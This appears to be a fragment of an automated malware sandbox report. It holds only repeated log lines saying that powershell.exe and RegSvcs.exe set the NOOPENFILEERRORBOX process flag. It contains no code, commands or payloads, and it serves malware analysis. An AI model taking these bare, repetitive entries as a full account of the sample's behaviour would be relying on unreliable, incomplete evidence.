                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
